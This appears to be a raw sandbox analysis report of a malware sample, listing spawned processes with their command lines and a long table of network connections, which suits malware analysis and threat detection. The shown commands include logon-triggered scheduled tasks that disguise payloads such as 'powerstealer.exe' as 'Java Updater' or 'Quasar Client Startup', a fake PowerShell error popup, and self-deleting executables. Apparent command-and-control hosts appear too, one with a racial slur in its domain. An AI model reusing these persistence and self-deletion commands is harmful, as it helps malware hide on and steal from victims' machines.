"schtasks" /create /tn "Java Updater" /sc ONLOGON /tr "C:\Users\Admin\Desktop\4363463463464363463463463\Files\spectrum.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Java Updater.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Java Updater.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Java Updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Java Updater.exe" /rl HIGHEST /f
C:\Users\Admin\Desktop\New Text Document mod.exse\a\888.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\888.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#vmm#>[System.Windows.Forms.MessageBox]::Show('Injection error! File must be started as Administrator!','','OK','Error')<#cuk#>;
C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\piotjhjadkaw.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\piotjhjadkaw.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\krgawdtyjawd.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\krgawdtyjawd.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\jdrgsotrti.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\jdrgsotrti.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisteruop.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisteruop.exe"
C:\Windows\system32\calc.exe
calc.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Users\Admin\Desktop\New Text Document mod.exse\a\mfcthased.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\mfcthased.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\ScreenUpdateSync.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\ScreenUpdateSync.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe"
C:\Windows\SysWOW64\msiexec.exe
msiexec /i vcredist.msi
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe"
C:\Users\Admin\AppData\Local\Temp\is-RH7SP.tmp\jy.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RH7SP.tmp\jy.tmp" /SL5="$405D2,1888137,52736,C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\testingfile.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\testingfile.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5844 -ip 5844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5844 -s 1112
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Discord.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Discord.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\Desktop\New Text Document mod.exse\a\RuntimeBroker.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\RuntimeBroker.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Loader.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Loader.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe
"C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\Wave.exe
C:\Users\Admin\AppData\Roaming\Wave.exe
C:\Users\Admin\Windows.exe
C:\Users\Admin\Windows.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\neofindsetup.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\neofindsetup.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISAB9511B1EE52494CA9BAED6A1536F012_1_0_6_1940.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\Desktop\New Text Document mod.exse\a\neofindsetup.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C5A61B1432C54B074EF4E967800944C6 C
C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 8428 -ip 8428
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8428 -s 1300
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | twizthash.net | udp |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 8.8.8.8:53 | 49.130.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| CN | 39.106.216.88:80 | tcp | |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | twizt.net | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| TH | 45.141.26.234:80 | 45.141.26.234 | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.26.141.45.in-addr.arpa | udp |
| AE | 62.60.226.24:80 | 62.60.226.24 | tcp |
| US | 8.8.8.8:53 | 24.226.60.62.in-addr.arpa | udp |
| TH | 185.84.161.186:80 | 185.84.161.186 | tcp |
| US | 8.8.8.8:53 | 186.161.84.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cxcs.microsoft.net | udp |
| GB | 88.221.135.27:443 | www.bing.com | tcp |
| GB | 23.218.72.229:443 | cxcs.microsoft.net | tcp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| FR | 91.134.9.160:443 | i.ibb.co | tcp |
| US | 8.8.8.8:53 | 229.72.218.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.9.134.91.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| FR | 91.134.9.160:443 | i.ibb.co | tcp |
| TH | 185.84.161.186:80 | 185.84.161.186 | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| TH | 45.141.26.234:7000 | tcp | |
| US | 8.8.8.8:53 | 209.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| CN | 101.133.229.117:18080 | tcp | |
| US | 8.8.8.8:53 | ipapi.co | udp |
| FR | 91.134.9.160:443 | i.ibb.co | tcp |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 104.26.9.44:443 | ipapi.co | tcp |
| CN | 47.92.31.237:8088 | tcp | |
| US | 8.8.8.8:53 | 44.9.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.233.202.91.in-addr.arpa | udp |
| FR | 91.134.9.160:443 | i.ibb.co | tcp |
| US | 8.8.8.8:53 | udp | |
| CO | 181.131.217.244:30203 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| CO | 181.131.217.244:30203 | tcp | |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | soft.110route.com | udp |
| CN | 39.106.158.243:80 | soft.110route.com | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.72.235.82:80 | www.update.microsoft.com | tcp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.235.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.cloudflare.com | udp |
| US | 104.16.123.96:443 | www.cloudflare.com | tcp |
| US | 104.26.9.44:443 | ipapi.co | tcp |
| RU | 91.122.218.118:40500 | udp | |
| UZ | 195.158.22.4:40500 | tcp | |
| US | 104.16.123.96:443 | www.cloudflare.com | tcp |
| US | 104.26.9.44:443 | ipapi.co | tcp |
| US | 104.16.123.96:443 | www.cloudflare.com | tcp |
| US | 104.26.9.44:443 | ipapi.co | tcp |
| US | 8.8.8.8:53 | 96.123.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.218.122.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.22.158.195.in-addr.arpa | udp |
| HK | 47.238.103.180:54322 | 47.238.103.180 | tcp |
| US | 8.8.8.8:53 | 180.103.238.47.in-addr.arpa | udp |
| YE | 78.137.64.239:40500 | udp | |
| US | 8.8.8.8:53 | 239.64.137.78.in-addr.arpa | udp |
| CO | 181.131.217.244:30203 | tcp | |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| IR | 2.176.90.19:40500 | udp | |
| US | 8.8.8.8:53 | 19.90.176.2.in-addr.arpa | udp |
| TJ | 95.142.87.201:40500 | udp | |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| US | 8.8.8.8:53 | 201.87.142.95.in-addr.arpa | udp |
| RU | 185.81.68.147:443 | 185.81.68.147 | tcp |
| IR | 5.219.134.102:40500 | tcp | |
| CN | 81.70.105.188:8989 | tcp | |
| US | 8.8.8.8:53 | 147.68.81.185.in-addr.arpa | udp |
| CN | 101.37.34.164:9000 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:1912 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| UZ | 90.156.163.119:40500 | udp | |
| RU | 185.81.68.147:1912 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 8.8.8.8:53 | 119.163.156.90.in-addr.arpa | udp |
| CO | 181.131.217.244:30203 | tcp | |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| KZ | 88.204.209.230:40500 | udp | |
| US | 8.8.8.8:53 | 230.209.204.88.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| RU | 37.78.33.95:40500 | udp | |
| CO | 181.131.217.244:30203 | tcp | |
| US | 8.8.8.8:53 | 95.33.78.37.in-addr.arpa | udp |
| KZ | 5.251.95.166:40500 | udp | |
| US | 8.8.8.8:53 | 166.95.251.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| TH | 85.203.4.238:80 | 85.203.4.238 | tcp |
| US | 8.8.8.8:53 | iam.nigga.dad | udp |
| TH | 103.230.121.81:30120 | iam.nigga.dad | tcp |
| KR | 146.56.118.137:80 | 146.56.118.137 | tcp |
| US | 8.8.8.8:53 | 238.4.203.85.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.121.230.103.in-addr.arpa | udp |
| AO | 129.122.141.24:40500 | udp | |
| US | 8.8.8.8:53 | 137.118.56.146.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.141.122.129.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.244.100.95.in-addr.arpa | udp |
| KR | 152.67.212.187:443 | 152.67.212.187 | tcp |
| UZ | 45.150.26.122:40500 | tcp | |
| US | 8.8.8.8:53 | 187.212.67.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.139.73.23.in-addr.arpa | udp |
| RU | 93.123.145.179:40500 | udp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| KR | 152.67.212.187:443 | 152.67.212.187 | tcp |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| US | 8.8.8.8:53 | 179.145.123.93.in-addr.arpa | udp |
| RU | 176.122.27.90:9999 | 176.122.27.90 | tcp |
| CN | 101.37.34.164:9000 | tcp | |
| RU | 176.122.27.90:8888 | tcp | |
| US | 8.8.8.8:53 | IreJMAyyAgFr.IreJMAyyAgFr | udp |
| US | 8.8.8.8:53 | 90.27.122.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 198.163.193.229:40500 | udp | |
| US | 8.8.8.8:53 | 229.193.163.198.in-addr.arpa | udp |
| N/A | 127.0.0.1:54636 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| FR | 194.59.30.220:5000 | 194.59.30.220 | tcp |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| US | 8.8.8.8:53 | 220.30.59.194.in-addr.arpa | udp |
| MX | 189.135.23.235:40500 | udp | |
| US | 8.8.8.8:53 | 235.23.135.189.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| KZ | 95.59.33.46:40500 | udp | |
| US | 8.8.8.8:53 | 46.33.59.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sKHBjdJjAeqineTxoPMnYrwBuSv.sKHBjdJjAeqineTxoPMnYrwBuSv | udp |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| DE | 167.71.56.116:22764 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| KG | 212.112.107.11:40500 | udp | |
| CN | 8.134.12.90:7777 | tcp | |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 11.107.112.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| YE | 134.35.46.82:40500 | udp | |
| RU | 91.122.218.118:40500 | tcp | |
| US | 8.8.8.8:53 | 82.46.35.134.in-addr.arpa | udp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | 152.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| US | 8.8.8.8:53 | 126.123.112.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| FR | 89.156.24.108:1738 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| IR | 151.232.245.146:40500 | udp | |
| US | 8.8.8.8:53 | 146.245.232.151.in-addr.arpa | udp |
| DE | 167.71.56.116:22764 | tcp | |
| US | 8.8.8.8:53 | download.emailorganizer.com | udp |
| NL | 190.2.142.115:80 | download.emailorganizer.com | tcp |
| UZ | 213.230.126.39:40500 | tcp | |
| US | 8.8.8.8:53 | blank-lqobj.in | udp |
| US | 8.8.8.8:53 | 115.142.2.190.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store4.gofile.io | udp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 8.8.8.8:53 | 245.70.14.31.in-addr.arpa | udp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| YE | 94.26.219.44:40500 | udp | |
| US | 8.8.8.8:53 | bgteamtestapp.azurewebsites.net | udp |
| US | 8.8.8.8:53 | 44.219.26.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| DE | 167.71.56.116:22764 | tcp | |
| US | 52.173.134.115:80 | bgteamtestapp.azurewebsites.net | tcp |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | 115.134.173.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 88.221.135.98:80 | r11.o.lencr.org | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 98.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| FR | 142.250.74.227:443 | gstatic.com | tcp |
| SY | 77.44.198.123:40500 | udp | |
| US | 8.8.8.8:53 | 227.74.250.142.in-addr.arpa | udp |
| DE | 167.71.56.116:22764 | tcp | |
| US | 8.8.8.8:53 | 123.198.44.77.in-addr.arpa | udp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 33.170.124.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store4.gofile.io | udp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 8.8.8.8:53 | iam.nigga.dad | udp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| DE | 94.156.177.33:80 | 94.156.177.33 | tcp |
| NL | 89.110.69.103:80 | tcp | |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| YE | 94.26.213.11:40500 | udp | |
| US | 8.8.8.8:53 | 33.177.156.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | windriversfiles.imeitools.com | udp |
| DE | 167.71.56.116:22764 | tcp | |
| CN | 221.231.39.69:80 | windriversfiles.imeitools.com | tcp |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| US | 8.8.8.8:53 | 11.213.26.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | cowod.hopto.org | udp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 148.163.102.170:4782 | tcp | |
| DE | 212.113.107.84:80 | 212.113.107.84 | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| NL | 89.110.69.103:80 | tcp | |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.138.159.162.in-addr.arpa | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | g.ceipmsn.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 20.41.62.11:80 | g.ceipmsn.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| IR | 5.239.6.63:40500 | udp | |
| US | 8.8.8.8:53 | 84.107.113.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.62.41.20.in-addr.arpa | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 20.41.62.11:80 | g.ceipmsn.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 63.6.239.5.in-addr.arpa | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | bingwallpaper.microsoft.com | udp |
| US | 52.173.134.115:443 | bingwallpaper.microsoft.com | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 8.8.8.8:53 | 57.110.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bingwallpaperimages.azureedge.net | udp |
| US | 13.107.246.64:443 | bingwallpaperimages.azureedge.net | tcp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| FR | 89.156.24.108:1738 | tcp | |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 8.8.8.8:53 | 64.246.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| US | 148.163.102.170:4782 | tcp | |
| US | 162.159.138.232:443 | discord.com | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| US | 162.159.138.232:443 | discord.com | tcp |
| EG | 102.189.164.188:40500 | udp | |
| US | 8.8.8.8:53 | 188.164.189.102.in-addr.arpa | udp |
| KR | 152.67.212.187:443 | 152.67.212.187 | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 95.100.245.144:443 | www.microsoft.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 144.245.100.95.in-addr.arpa | udp |
| MX | 189.173.142.192:40500 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| UZ | 213.230.99.119:40500 | udp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| HK | 47.238.55.14:5555 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | 119.99.230.213.in-addr.arpa | udp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| US | 8.8.8.8:53 | deauduafzgezzfgm.top | udp |
| RU | 185.215.113.66:80 | deauduafzgezzfgm.top | tcp |
| SA | 141.147.143.12:80 | 141.147.143.12 | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 12.143.147.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| UZ | 195.158.31.102:40500 | udp | |
